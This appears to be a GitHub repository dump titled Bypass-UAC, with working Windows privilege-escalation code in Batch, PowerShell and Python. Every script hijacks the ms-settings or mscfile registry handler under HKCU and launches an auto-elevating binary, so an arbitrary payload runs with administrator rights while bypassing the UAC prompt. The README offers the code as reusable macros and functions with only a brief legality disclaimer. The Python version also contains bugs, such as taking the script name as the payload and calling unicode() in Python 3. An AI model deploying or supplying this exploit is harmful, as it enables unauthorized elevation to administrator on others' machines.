├── README.md ├── batch ├── elev-macro.bat ├── elev.bat └── tests.bat ├── powershell ├── elev-function.ps1 └── elev.ps1 └── python └── elev.py /README.md: -------------------------------------------------------------------------------- 1 | # Bypass-UAC 2 | 3 | This is a Windows privilege escalation vulnerability leveraging the misconfigured registry search paths of auto-elevating exeutables. 4 | Refer to [UACME](https://github.com/hfiref0x/UACME) for more details. 5 | 6 | For demonstration and convenience, I implemented the exploit in the form of macros/functions. Supported languages: 7 | - Batch 8 | - Powershell 9 | - Python 3 10 | 11 | # Disclaimer 12 | 13 | This repository's code is merely a proof-of-concept and should by all means be used legally and morally. 14 | -------------------------------------------------------------------------------- /batch/elev-macro.bat: -------------------------------------------------------------------------------- 1 | ::USE INSIDE BATCH FILES ONLY!!! 2 | ::SYNTAX 3 | :: CALL elev-macro.bat 4 | :: %$elev% ... 5 | @echo off 6 | SETLOCAL DisableDelayedExpansion EnableExtensions 7 | 8 | 9 | ::Def 10 | (set \n=^^^ 11 | %= DO NOT REMOVE =% 12 | ) 13 | 14 | 15 | ::NOT win10 16 | set "key=mscfile" 17 | set "trigger=CompMgmtLauncher.exe" 18 | 19 | 20 | ::win10 21 | FOR /F "tokens=4,5 delims=. " %%1 in ('ver') do if "%%1" equ "10" if "%%2" equ "0" ( 22 | set "key=ms-settings" 23 | set "trigger=ComputerDefaults.exe" 24 | ) 25 | 26 | 27 | set regPath="HKCU\Software\Classes\%key%\shell\open\command" 28 | 29 | 30 | ::Macro 31 | ENDLOCAL &^ 32 | set $elev=FOR %%A in (args main) do if "%%A" == "main" (%\n% 33 | for %%P in (!payload!) do (%\n% 34 | reg add %regpath% /d "%%~P" /f%\n% 35 | reg add %regpath% /v DelegateExecute /f%\n% 36 | %trigger%%\n% 37 | reg delete "HKCU\Software\Classes\%key%" /f%\n% 38 | )^>nul 2^>^&1%\n% 39 | ) ELSE SETLOCAL EnableDelayedExpansion^&set payload=, -------------------------------------------------------------------------------- /batch/elev.bat: -------------------------------------------------------------------------------- 1 | @echo off 2 | if "%~1" equ "" (set PAYLOAD=cmd.exe) ELSE set "PAYLOAD=%~1" 3 | 4 | 5 | net session >nul 2>&1 || goto :label 6 | %PAYLOAD% 7 | exit /b 2 8 | 9 | 10 | :label 11 | ::REQUIREMENTS 12 | whoami /groups|findstr /i "\" >nul 2>&1 13 | if ERRORLEVEL 1 exit /b 1 14 | 15 | 16 | ::Windows Version 17 | for /f "tokens=4-5 delims=. " %%i in ('ver') do set WIN_VER=%%i.%%j 18 | 19 | 20 | ::UAC Level 21 | :: 2 High 22 | :: 5 Default 23 | :: 0 None 24 | set key="HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\System" 25 | for /f "skip=2 tokens=3" %%U in ('REG QUERY %key% /v ConsentPromptBehaviorAdmin') do set /a "UAC=%%U" 26 | 27 | 28 | ::EXPLOIT 29 | if %UAC% equ 2 exit /b 1 30 | if %UAC% equ 5 ( 31 | for %%V in (6.1 6.2 6.3) do if "%WIN_VER%" == "%%V" call :exploit mscfile CompMgmtLauncher.exe %PAYLOAD% 32 | if "%WIN_VER%" == "10.0" call :exploit ms-settings ComputerDefaults.exe %PAYLOAD% 33 | )>nul 2>&1 34 | if %UAC% equ 0 powershell -c Start-Process "%PAYLOAD%" -Verb runas 35 | 36 | 37 | exit /b 0 38 | 39 | 40 | :exploit 41 | set regPath="HKCU\Software\Classes\%1\shell\open\command" 42 | reg add %regPath% /d "%~3" /f 43 | reg add %regPath% /v DelegateExecute /f 44 | %~2 45 | reg delete "HKCU\Software\Classes\%1" /f 46 | exit /b -------------------------------------------------------------------------------- /batch/tests.bat: -------------------------------------------------------------------------------- 1 | @echo off 2 | call elev-macro.bat 3 | %$elev% calc "cmd /k whoami /priv" -------------------------------------------------------------------------------- /powershell/elev-function.ps1: -------------------------------------------------------------------------------- 1 | function Bypass-UAC{ 2 | [CmdletBinding()] 3 | param([string]$payload='cmd.exe') 4 | 5 | #Get Windows Version 6 | $ver = [System.Environment]::OSVersion.Version.Major 7 | 8 | #Get UAC Level 9 | $key = "HKLM:\Software\Microsoft\Windows\CurrentVersion\Policies\System" 10 | $uac = Get-ItemPropertyValue -Path $key -Name ConsentPromptBehaviorAdmin 11 | 12 | function Add-RegKey([string]$key, [string]$exploit, [string]$payload='cmd.exe'){ 13 | $regPath = "HKCU:\Software\Classes\$key\shell\open\command" 14 | New-Item $regPath -Force 15 | New-ItemProperty $regPath -Name "DelegateExecute" -Value $null -Force 16 | Set-ItemProperty $regPath -Name "(default)" -Value $payload -Force 17 | Start-Process $exploit 18 | Start-Sleep -s 5 19 | Remove-Item $regPath -Force -Recurse 20 | } 21 | 22 | if ($uac -eq 2) { 23 | $UAC_LEVEL = 'High' 24 | } elseif ($uac -eq 0) { 25 | $UAC_LEVEL = 'None' 26 | } elseif ($uac -eq 5) { 27 | $UAC_LEVEL = 'Default' 28 | } else { 29 | $UAC_LEVEL = 'Unknown' 30 | } 31 | 32 | if ($UAC_LEVEL -eq "High") { 33 | exit 34 | } elseif ($UAC_LEVEL -eq "None") { 35 | Start-Process -FilePath $payload -verb runas 36 | } else { 37 | if ($ver -eq 10) { 38 | Add-RegKey ms-settings ComputerDefaults.exe $payload 39 | } else { 40 | Add-RegKey mscfile CompMgmtLauncher.exe $payload 41 | } 42 | } 43 | } 44 | Bypass-UAC 'cmd.exe' -------------------------------------------------------------------------------- /powershell/elev.ps1: -------------------------------------------------------------------------------- 1 | #Define payload 2 | if (!$args[0]) {$payload = 'cmd.exe'} else {$payload = $args[0]} 3 | 4 | #Get Windows Version 5 | $ver = [System.Environment]::OSVersion.Version.Major 6 | 7 | #Get UAC Level 8 | $key = "HKLM:\Software\Microsoft\Windows\CurrentVersion\Policies\System" 9 | $uac = Get-ItemPropertyValue -Path $key -Name ConsentPromptBehaviorAdmin 10 | 11 | function Bypass-UAC{ 12 | [CmdletBinding()] 13 | param([string]$key, [string]$exploit, [string]$payload='cmd.exe') 14 | $regPath = "HKCU:\Software\Classes\$key\shell\open\command" 15 | New-Item $regPath -Force 16 | New-ItemProperty $regPath -Name "DelegateExecute" -Value $null -Force 17 | Set-ItemProperty $regPath -Name "(default)" -Value $payload -Force 18 | Start-Process $exploit 19 | Start-Sleep -s 5 20 | Remove-Item $regPath -Force -Recurse 21 | } 22 | 23 | if ($uac -eq 2) { 24 | $UAC_LEVEL = 'High' 25 | } elseif ($uac -eq 0) { 26 | $UAC_LEVEL = 'None' 27 | } elseif ($uac -eq 5) { 28 | $UAC_LEVEL = 'Default' 29 | } else { 30 | $UAC_LEVEL = 'Unknown' 31 | } 32 | 33 | #EXPLOIT 34 | if ($UAC_LEVEL -eq "High") { 35 | exit 36 | } elseif ($UAC_LEVEL -eq "None") { 37 | Start-Process -FilePath $payload -verb runas 38 | } else { 39 | if ($ver -eq 10) { 40 | Bypass-UAC ms-settings ComputerDefaults.exe $payload 41 | } else { 42 | Bypass-UAC mscfile CompMgmtLauncher.exe $payload 43 | } 44 | } 45 | -------------------------------------------------------------------------------- /python/elev.py: -------------------------------------------------------------------------------- 1 | from winreg import * 2 | import sys, ctypes, subprocess, os, time 3 | HKCU = HKEY_CURRENT_USER 4 | 5 | #Parameters 6 | if len(sys.argv) == 2: 7 | payload = sys.argv[0] 8 | else: 9 | payload = 'cmd.exe' 10 | 11 | #If already elevated 12 | if ctypes.windll.shell32.IsUserAnAdmin() == 1: 13 | os.startfile(payload) 14 | sys.exit(0) 15 | 16 | #Get Windows Version 17 | ver = sys.getwindowsversion() 18 | win_ver = '.'.join(map(str,(ver.major, ver.minor))) 19 | 20 | 21 | #Get UAC Level 22 | key = r'Software\Microsoft\Windows\CurrentVersion\Policies\System' 23 | uac = EnumValue(OpenKey(HKEY_LOCAL_MACHINE, key), 0)[1] 24 | 25 | def create_key(path, key, value): 26 | try: 27 | CreateKey(HKCU, path) 28 | reg_key = OpenKey(HKCU, path, 0, KEY_WRITE) 29 | SetValueEx(reg_key, key, 0, REG_SZ, value) 30 | CloseKey(reg_key) 31 | except WindowsError: 32 | raise 33 | 34 | def delete_key(path): 35 | key = path.split("\\") 36 | for x in range(6,2,-1): 37 | reg_path = '\\'.join(key[:x]) 38 | DeleteKey(HKCU, reg_path) 39 | 40 | def exploit(key, exploit, cmd): 41 | path = r'Software\Classes\{key}\shell\open\command'.format(key=key) 42 | create_key(path, None, cmd) 43 | create_key(path, 'DelegateExecute', None) 44 | os.startfile(exploit) 45 | time.sleep(5) 46 | delete_key(path) 47 | 48 | if uac == 2: 49 | UAC_LEVEL = 'High' 50 | elif uac == 5: 51 | UAC_LEVEL = 'Default' 52 | elif uac == 0: 53 | UAC_LEVEL = 'None' 54 | else: 55 | UAC_LEVEL = 'Unknown' 56 | 57 | #EXPLOIT 58 | if UAC_LEVEL == 'High': 59 | sys.exit() 60 | elif UAC_LEVEL == 'None': 61 | ctypes.windll.shell32.ShellExecuteW(None, u"runas", unicode(sys.executable), unicode(payload), None, 1) 62 | else: 63 | if win_ver == '10.0': 64 | exploit('ms-settings', 'ComputerDefaults.exe', payload) 65 | else: 66 | exploit('mscfile', 'CompMgmtLauncher.exe', payload) 67 | --------------------------------------------------------------------------------